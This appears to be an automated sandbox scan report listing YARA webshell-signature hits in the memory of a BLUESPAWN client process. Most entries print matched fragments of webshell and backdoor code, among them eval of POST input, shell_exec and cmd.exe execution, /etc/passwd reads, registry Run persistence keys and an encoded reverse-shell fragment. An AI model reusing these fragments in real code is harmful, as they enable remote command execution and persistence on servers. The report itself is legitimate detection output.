Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__PH_Vayv_PHVayv_PH_Vayv | PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php | Florian Roth | - 0x310830:$s4: <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle
- 0x364a00:$s4: <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle
- 0x310885:$s12: <? if ($ekinci=="." or $ekinci=="..") {
- 0x3108ba:$s17: name="duzenx2" value="Klas
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_1 | PHP Webshells Github Archive - from files Dive Shell 1.0 - Emperor Hacking Team.php, Dive_Shell_1.0_Emperor_Hacking_Team.php, SimShell 1.0 - Simorgh Security MGZ.php, SimShell_1.0_-_Simorgh_Security_MGZ.php | Florian Roth | - 0x310b10:$s1: $token = substr($_REQUEST['command'], 0, $length);
- 0x310b4f:$s4: var command_hist = new Array(<?php echo $js_command_hist ?>);
- 0x310b99:$s7: $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
- 0x310bdc:$s9: document.shell.command.value = command_hist[current_line];
- 0x310c23:$s16: $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $
- 0x364ce0:$s16: $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $
- 0x310c78:$s19: if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
- 0x310cc1:$s20: if (e.keyCode == 38 && current_line < command_hist.length-1) {
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_2 | PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php | Florian Roth | - 0x310f73:$s3: if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
- 0x310fba:$s4: \$port = {$_POST['port']};
- 0x310fe1:$s5: $_POST['installpath'] = "temp.pl";}
- 0x311011:$s14: if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["u
- 0x364fc5:$s14: if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["u
- 0x31106b:$s16: copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]
- 0x365016:$s16: copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__CrystalShell_v_1_erne_stres | PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php | Florian Roth | - 0x3112d4:$s1: <input type='submit' value=' open (shill.txt) '>
- 0x311312:$s4: var_dump(curl_exec($ch));
- 0x311338:$s7: if(empty($_POST['Mohajer22'])){
- 0x311364:$s10: $m=$_POST['curl'];
- 0x311383:$s13: $u1p=$_POST['copy'];
- 0x3113a4:$s14: if(empty(\$_POST['cmd'])){
- 0x3113cb:$s15: $string = explode("|",$string);
- 0x3113f7:$s16: $stream = imap_open("/etc/passwd", "", "");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_3 | PHP Webshells Github Archive - from files Antichat Shell v1.3.php, Antichat Shell. Modified by Go0o$E.php, Antichat Shell.php, fatal.php | Florian Roth | - 0x311642:$s0: header('Content-Length:'.filesize($file).'');
- 0x31167c:$s4: <textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['comma
- 0x365442:$s4: <textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['comma
- 0x3116cc:$s7: if(filetype($dir . $file)=="file")$files[]=$file;
- 0x31170a:$s14: elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
- 0x31174b:$s20: $info .= (($perms & 0x0004) ? 'r' : '-');
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_4 | PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php | Florian Roth | - 0x302681:$s0: if ($filename != "." and $filename != ".."){
- 0x311a3b:$s0: if ($filename != "." and $filename != ".."){
- 0x311a74:$s2: $owner["write"] = ($mode & 00200) ? 'w' : '-';
- 0x3124e6:$s2: $owner["write"] = ($mode & 00200) ? 'w' : '-';
- 0x311aaf:$s5: $owner["execute"] = ($mode & 00100) ? 'x' : '-';
- 0x311aec:$s6: $world["write"] = ($mode & 00002) ? 'w' : '-';
- 0x311b27:$s7: $world["execute"] = ($mode & 00001) ? 'x' : '-';
- 0x312522:$s7: $world["execute"] = ($mode & 00001) ? 'x' : '-';
- 0x311b64:$s10: foreach ($arr as $filename) {
- 0x311b8e:$s19: else if( $mode & 0x6000 ) { $type='b'; }
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_GFS | PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php | Florian Roth | - 0x311de9:$s0: OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
- 0x311e29:$s1: lIENPTk47DQpleGl0IDA7DQp9DQp9";
- 0x311e55:$s2: Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm
- 0x3659fd:$s2: Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__CrystalShell_v_1_sosyete_stres | PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php | Florian Roth | - 0x3120ca:$s1: A:visited { COLOR:blue; TEXT-DECORATION: none}
- 0x312105:$s4: A:active {COLOR:blue; TEXT-DECORATION: none}
- 0x31213e:$s11: scrollbar-darkshadow-color: #101842;
- 0x31216f:$s15: <a bookmark="minipanel">
- 0x312194:$s16: background-color: #EBEAEA;
- 0x3121bb:$s18: color: #D5ECF9;
- 0x3121d7:$s19: <center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 border
- 0x365c88:$s19: <center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 border
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_10 | PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php | Florian Roth | - 0x31249f:$s2: $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
- 0x3124e6:$s6: $owner["write"] = ($mode & 00200) ? 'w' : '-';
- 0x312522:$s11: $world["execute"] = ($mode & 00001) ? 'x' : '-';
- 0x312560:$s12: else if( $mode & 0xA000 )
- 0x312587:$s17: $s=sprintf("%1s", $type);
- 0x3125ae:$s20: font-size: 8pt;
- 0x313f2a:$s20: font-size: 8pt;
- 0x3670b5:$s20: font-size: 8pt;
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_11 | PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php | Florian Roth | - 0x312844:$s5: $filename = $backupstring."$filename";
- 0x312877:$s6: while ($file = readdir($folder)) {
- 0x3128a6:$s7: if($file != "." && $file != "..")
- 0x3128d4:$s9: $backupstring = "copy_of_";
- 0x3128fc:$s10: if( file_exists($file_name))
- 0x312925:$s13: global $file_name, $filename;
- 0x31294f:$s16: copy($file,"$filename");
- 0x312974:$s18: <td width="49%" height="142">
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell__findsock_php_findsock_shell_php_reverse_shell | PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php | Florian Roth | - 0x312bd2:$s1: // me at pentestmonkey@pentestmonkey.net
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WebShell_Generic_PHP_6 | PHP Webshells Github Archive - from files c0derz shell [csh | unknown | - 0x312e61:$s2: @eval(stripslashes($_POST['phpcode']));
- 0x312e95:$s5: echo shell_exec($com);
- 0x312eb8:$s7: if($sertype == "winda"){
- 0x312edd:$s8: function execute($com)
- 0x312f00:$s12: echo decode(execute($cmd));
- 0x312f28:$s15: echo system($com);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Unpack_Injectt | Webshells Auto-generated - file Injectt.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31305b:$s2: %s -Run -->To Install And Run The Service
- 0x366696:$s2: %s -Run -->To Install And Run The Service
- 0x3130ae:$s3: %s -Uninstall -->To Uninstall The Service
- 0x3666df:$s3: %s -Uninstall -->To Uninstall The Service
- 0x3130fb:$s4: (STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN
- 0x366722:$s4: (STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_DevPack_fso | Webshells Auto-generated - file fso.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31326b:$s0: PageFSO Below -->
- 0x366824:$s0: PageFSO Below -->
- 0x31328e:$s1: theFile.writeLine("<script language=""vbscript"" runat=server>if request("""&cli
- 0x36683d:$s1: theFile.writeLine("<script language=""vbscript"" runat=server>if request("""&cli
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FeliksPack3___PHP_Shells_ssh | Webshells Auto-generated - file ssh.php | Yara Bulk Rule Generator by Florian Roth | - 0x313409:$s0: eval(gzinflate(str_rot13(base64_decode('
- 0x36694a:$s0: eval(gzinflate(str_rot13(base64_decode('
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Debug_BDoor | Webshells Auto-generated - file BDoor.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31354d:$s1: \BDoor\
- 0x316be0:$s1: \BDoor\
- 0x3201ef:$s1: \BDoor\
- 0x366a20:$s1: \BDoor\
- 0x368ff1:$s1: \BDoor\
- 0x36f665:$s1: \BDoor\
- 0x2ceb52:$s4: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- 0x313561:$s4: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- 0x3364e6:$s4: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- 0x366a2a:$s4: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | bin_Client | Webshells Auto-generated - file Client.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3136aa:$s0: Recieved respond from server!!
- 0x366b05:$s0: Recieved respond from server!!
- 0x3136d5:$s4: packet door client
- 0x366b26:$s4: packet door client
- 0x3136f4:$s5: input source port(whatever you want):
- 0x366b3b:$s5: input source port(whatever you want):
- 0x313726:$s7: Packet sent,waiting for reply...
- 0x366b63:$s7: Packet sent,waiting for reply...
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ZXshell2_0_rar_Folder_ZXshell | Webshells Auto-generated - file ZXshell.exe | Yara Bulk Rule Generator by Florian Roth | - 0x313876:$s0: WPreviewPagesn
- 0x366c45:$s0: WPreviewPagesn
- 0x313891:$s1: DA!OLUTELY N
- 0x366c56:$s1: DA!OLUTELY N
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | RkNTLoad | Webshells Auto-generated - file RkNTLoad.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3139b9:$s1: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x31a443:$s1: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x366d10:$s1: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x36b6a4:$s1: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x313a14:$s2: 5pur+virtu!
- 0x313c4c:$s2: 5pur+virtu!
- 0x366d61:$s2: 5pur+virtu!
- 0x366edb:$s2: 5pur+virtu!
- 0x313a2c:$s3: ugh spac#n
- 0x366d6f:$s3: ugh spac#n
- 0x313a43:$s4: xcEx3WriL4
- 0x366d7c:$s4: xcEx3WriL4
- 0x15d1d6:$s5: runtime error
- 0x16d481:$s5: runtime error
- 0x313a5a:$s5: runtime error
- 0x366d89:$s5: runtime error
- 0x313a74:$s6: loseHWait.Sr.
- 0x366d99:$s6: loseHWait.Sr.
- 0x313a8e:$s7: essageBoxAw
- 0x366da9:$s7: essageBoxAw
- 0x313aa6:$s8: $Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | binder2_binder2 | Webshells Auto-generated - file binder2.exe | Yara Bulk Rule Generator by Florian Roth | - 0x313c12:$s0: IsCharAlphaNumericA
- 0x366eb5:$s0: IsCharAlphaNumericA
- 0x8bf9c:$s2: WideCharToM
- 0x10e24f:$s2: WideCharToM
- 0x313c32:$s2: WideCharToM
- 0x366ecb:$s2: WideCharToM
- 0x313c4a:$s4: g 5pur+virtu!
- 0x366ed9:$s4: g 5pur+virtu!
- 0x313c64:$s5: \syslog.en
- 0x366ee9:$s5: \syslog.en
- 0x313c7b:$s6: heap7'7oqk?not=
- 0x366ef6:$s6: heap7'7oqk?not=
- 0x313c97:$s8: - Kablto in
- 0x366f08:$s8: - Kablto in
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | thelast_orice2 | Webshells Auto-generated - file orice2.php | Yara Bulk Rule Generator by Florian Roth | - 0x313dc2:$s0: $aa = $_GET['aa'];
- 0x366fc5:$s0: $aa = $_GET['aa'];
- 0x313de2:$s1: echo $aa;
- 0x366fdb:$s1: echo $aa;
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_sincap | Webshells Auto-generated - file sincap.php | Yara Bulk Rule Generator by Florian Roth | - 0x313f09:$s0: <font color="#E5E5E5" style="font-size: 8pt; font-weight: 700" face="Arial">
- 0x367094:$s0: <font color="#E5E5E5" style="font-size: 8pt; font-weight: 700" face="Arial">
- 0x313f66:$s4: <body text="#008000" bgcolor="#808080" topmargin="0" leftmargin="0" rightmargin=
- 0x3670e7:$s4: <body text="#008000" bgcolor="#808080" topmargin="0" leftmargin="0" rightmargin=
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PhpShell | Webshells Auto-generated - file PhpShell.php | Yara Bulk Rule Generator by Florian Roth | - 0x3140d2:$s2: href="http://www.gimpster.com/wiki/PhpShell">www.gimpster.com/wiki/PhpShell</a>.
- 0x3671e5:$s2: href="http://www.gimpster.com/wiki/PhpShell">www.gimpster.com/wiki/PhpShell</a>.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_DevPack_config | Webshells Auto-generated - file config.asp | Yara Bulk Rule Generator by Florian Roth | - 0x314248:$s0: const adminPassword="
- 0x3672ed:$s0: const adminPassword="
- 0x31426a:$s2: const userPassword="
- 0x367305:$s2: const userPassword="
- 0x31428b:$s3: const mVersion=
- 0x36731c:$s3: const mVersion=
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | sendmail | Webshells Auto-generated - file sendmail.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3143b6:$s3: _NextPyC808
- 0x3673d9:$s3: _NextPyC808
- 0x3143ce:$s6: Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)
- 0x3673e7:$s6: Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_zehir4 | Webshells Auto-generated - file zehir4.asp | Yara Bulk Rule Generator by Florian Roth | - 0x314539:$s5: byMesaj
- 0x3674e4:$s5: byMesaj
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hkshell_hkshell | Webshells Auto-generated - file hkshell.exe | Yara Bulk Rule Generator by Florian Roth | - 0x314664:$s1: PrSessKERNELU
- 0x3675a1:$s1: PrSessKERNELU
- 0x31467e:$s2: Cur3ntV7sion
- 0x3675b1:$s2: Cur3ntV7sion
- 0x314697:$s3: Explorer8
- 0x3675c0:$s3: Explorer8
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | iMHaPFtp | Webshells Auto-generated - file iMHaPFtp.php | Yara Bulk Rule Generator by Florian Roth | - 0x3147bc:$s1: echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">
- 0x367677:$s1: echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Unpack_TBack | Webshells Auto-generated - file TBack.dll | Yara Bulk Rule Generator by Florian Roth | - 0x314929:$s5: \final\new\lcc\public.dll
- 0x367776:$s5: \final\new\lcc\public.dll
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | DarkSpy105 | Webshells Auto-generated - file DarkSpy105.exe | Yara Bulk Rule Generator by Florian Roth | - 0x314a62:$s7: Sorry,DarkSpy got an unknown exception,please re-run it,thanks!
- 0x367841:$s7: Sorry,DarkSpy got an unknown exception,please re-run it,thanks!
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | EditServer_Webshell | Webshells Auto-generated - file EditServer.exe | Yara Bulk Rule Generator by Florian Roth | - 0x314bc5:$s2: Server %s Have Been Configured
- 0x367936:$s2: Server %s Have Been Configured
- 0x314bf0:$s5: The Server Password Exceeds 32 Characters
- 0x367957:$s5: The Server Password Exceeds 32 Characters
- 0x314c26:$s8: 9--Set Procecess Name To Inject DLL
- 0x367983:$s8: 9--Set Procecess Name To Inject DLL
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_reader | Webshells Auto-generated - file reader.asp | Yara Bulk Rule Generator by Florian Roth | - 0x314d67:$s2: mailto:mailbomb@hotmail.
- 0x367a56:$s2: mailto:mailbomb@hotmail.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ASP_CmdAsp | Webshells Auto-generated - file CmdAsp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x314e9b:$s2: ' -- Read the output from our command and remove the temp file -- '
- 0x367b1c:$s2: ' -- Read the output from our command and remove the temp file -- '
- 0x2d6463:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x2e1dcd:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x309f48:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x314eeb:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x31720f:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x33b5de:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x34335e:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x35fb91:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x367b62:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x369436:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x314f3e:$s9: ' -- create the COM objects that we will be using -- '
- 0x367bab:$s9: ' -- create the COM objects that we will be using -- '
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | KA_uShell | Webshells Auto-generated - file KA_uShell.php | Yara Bulk Rule Generator by Florian Roth | - 0x315092:$s5: if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass
- 0x367c91:$s5: if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass
- 0x2eb6e4:$s6: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
- 0x3150e2:$s6: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
- 0x34980c:$s6: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
- 0x367cd7:$s6: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHP_Backdoor_v1 | Webshells Auto-generated - file PHP Backdoor v1.php | Yara Bulk Rule Generator by Florian Roth | - 0x31524b:$s5: echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$th
- 0x367dd2:$s5: echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$th
- 0x31529f:$s8: echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy
- 0x367e1c:$s8: echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | svchostdll | Webshells Auto-generated - file svchostdll.dll | Yara Bulk Rule Generator by Florian Roth | - 0x35009:$s0: InstallService
- 0x3502d:$s0: InstallService
- 0x38341:$s0: InstallService
- 0x38358:$s0: InstallService
- 0xb72bc:$s0: InstallService
- 0xb72e0:$s0: InstallService
- 0xba5f4:$s0: InstallService
- 0xba60b:$s0: InstallService
- 0x3153ed:$s0: InstallService
- 0x367efc:$s0: InstallService
- 0x315408:$s1: RundllInstallA
- 0x367f0d:$s1: RundllInstallA
- 0x315423:$s2: UninstallService
- 0x367f1e:$s2: UninstallService
- 0x315440:$s3: &G3 Users In RegistryD
- 0x367f31:$s3: &G3 Users In RegistryD
- 0x315463:$s4: OL_SHUTDOWN;I
- 0x367f4a:$s4: OL_SHUTDOWN;I
- 0x31547d:$s5: SvcHostDLL.dll
- 0x367f5a:$s5: SvcHostDLL.dll
- 0x315498:$s6: RundllUninstallA
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_DevPack_server | Webshells Auto-generated - file server.asp | Yara Bulk Rule Generator by Florian Roth | - 0x315607:$s0: PageServer Below -->
- 0x368058:$s0: PageServer Below -->
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | vanquish | Webshells Auto-generated - file vanquish.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31573c:$s3: You cannot delete protected files/folders! Instead, your attempt has been logged
- 0x36811f:$s3: You cannot delete protected files/folders! Instead, your attempt has been logged
- 0x315799:$s8: ?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU
- 0x368172:$s8: ?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU
- 0x3157f6:$s9: ?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z
- 0x3681c5:$s9: ?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | winshell | Webshells Auto-generated - file winshell.exe | Yara Bulk Rule Generator by Florian Roth | - 0x22512:$s0: Software\Microsoft\Windows\CurrentVersion\RunServices
- 0xa47c5:$s0: Software\Microsoft\Windows\CurrentVersion\RunServices
- 0x315962:$s0: Software\Microsoft\Windows\CurrentVersion\RunServices
- 0x3682c3:$s0: Software\Microsoft\Windows\CurrentVersion\RunServices
- 0x3c5743:$s0: Software\Microsoft\Windows\CurrentVersion\RunServices
- 0x3159a4:$s1: WinShell Service
- 0x3682fb:$s1: WinShell Service
- 0x3159c1:$s2: __GLOBAL_HEAP_SELECTED
- 0x36830e:$s2: __GLOBAL_HEAP_SELECTED
- 0x3159e4:$s3: __MSVCRT_HEAP_SELECT
- 0x368327:$s3: __MSVCRT_HEAP_SELECT
- 0x315a05:$s4: Provide Windows CmdShell Service
- 0x36833e:$s4: Provide Windows CmdShell Service
- 0x315a32:$s5: URLDownloadToFileA
- 0x368361:$s5: URLDownloadToFileA
- 0x315a51:$s6: RegisterServiceProcess
- 0x368376:$s6: RegisterServiceProcess
- 0x8bf7d:$s7: GetModuleBaseNameA
- 0x10e230:$s7: GetModuleBaseNameA
- 0x315a74:$s7: GetModuleBaseNameA
- 0x36838f:$s7: GetModuleBaseNameA
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_remview | Webshells Auto-generated - file remview.php | Yara Bulk Rule Generator by Florian Roth | - 0x315bd3:$s2: echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
- 0x368476:$s2: echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
- 0x315c30:$s3: echo "<script>str$i=\"".str_replace("\"","\\\"",str_replace("\\","\\\\"
- 0x3684c9:$s3: echo "<script>str$i=\"".str_replace("\"","\\\"",str_replace("\\","\\\\"
- 0x315c8d:$s4: echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<
- 0x36851c:$s4: echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | saphpshell | Webshells Auto-generated - file saphpshell.php | Yara Bulk Rule Generator by Florian Roth | - 0x315dfd:$s0: <td><input type="text" name="command" size="60" value="<?=$_POST['command']?>
- 0x36861e:$s0: <td><input type="text" name="command" size="60" value="<?=$_POST['command']?>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop2006_rar_Folder_2006Z | Webshells Auto-generated - file 2006Z.exe | Yara Bulk Rule Generator by Florian Roth | - 0x315f75:$s1: wangyong,czy,allen,lcx,Marcos,kEvin1986,myth
- 0x368728:$s1: wangyong,czy,allen,lcx,Marcos,kEvin1986,myth
- 0x315fae:$s8: System\CurrentControlSet\Control\Keyboard Layouts\%.8x
- 0x368757:$s8: System\CurrentControlSet\Control\Keyboard Layouts\%.8x
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | admin_ad | Webshells Auto-generated - file admin-ad.asp | Yara Bulk Rule Generator by Florian Roth | - 0x316100:$s6: <td align="center"> <input name="cmd" type="text" id="cmd" siz
- 0x36883b:$s6: <td align="center"> <input name="cmd" type="text" id="cmd" siz
- 0x31614b:$s7: Response.write"<a href='"&url&"?path="&Request("oldpath")&"&attrib="&attrib&"'><
- 0x36887c:$s7: Response.write"<a href='"&url&"?path="&Request("oldpath")&"&attrib="&attrib&"'><
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_casus15 | Webshells Auto-generated - file casus15.php | Yara Bulk Rule Generator by Florian Roth | - 0x3162bb:$s6: if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!=".."))
- 0x36897e:$s6: if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!=".."))
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | BIN_Client | Webshells Auto-generated - file Client.exe | Yara Bulk Rule Generator by Florian Roth | - 0x316417:$s0: =====Remote Shell Closed=====
- 0x368a6c:$s0: =====Remote Shell Closed=====
- 0x316441:$s2: All Files(*.*)|*.*||
- 0x368a8c:$s2: All Files(*.*)|*.*||
- 0x316462:$s6: WSAStartup Error!
- 0x368aa3:$s6: WSAStartup Error!
- 0x316480:$s7: SHGetFileInfoA
- 0x368ab7:$s7: SHGetFileInfoA
- 0x31649b:$s8: CreateThread False!
- 0x368ac8:$s8: CreateThread False!
- 0x3164bb:$s9: Port Number Error
- 0x368ade:$s9: Port Number Error
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shelltools_g0t_root_uptime | Webshells Auto-generated - file uptime.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3165f8:$s0: JDiamondCSlC~
- 0x368bad:$s0: JDiamondCSlC~
- 0x316612:$s1: CharactQA
- 0x368bbd:$s1: CharactQA
- 0x316628:$s2: $Info: This file is packed with the UPX executable packer $
- 0x31c483:$s2: $Info: This file is packed with the UPX executable packer $
- 0x368bc9:$s2: $Info: This file is packed with the UPX executable packer $
- 0x36ccd1:$s2: $Info: This file is packed with the UPX executable packer $
- 0x316670:$s5: HandlereateConso
- 0x368c07:$s5: HandlereateConso
- 0x31668d:$s7: ION\System\FloatingPo
- 0x31c52e:$s7: ION\System\FloatingPo
- 0x368c1a:$s7: ION\System\FloatingPo
- 0x36cd5e:$s7: ION\System\FloatingPo
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Simple_PHP_BackDooR | Webshells Auto-generated - file Simple_PHP_BackDooR.php | Yara Bulk Rule Generator by Florian Roth | - 0x3167d4:$s0: <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he
- 0x368cf3:$s0: <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he
- 0x2e1866:$s6: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn
- 0x316831:$s6: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn
- 0x342fa1:$s6: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn
- 0x368d46:$s6: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn
- 0x306cf3:$s9: // a simple php backdoor
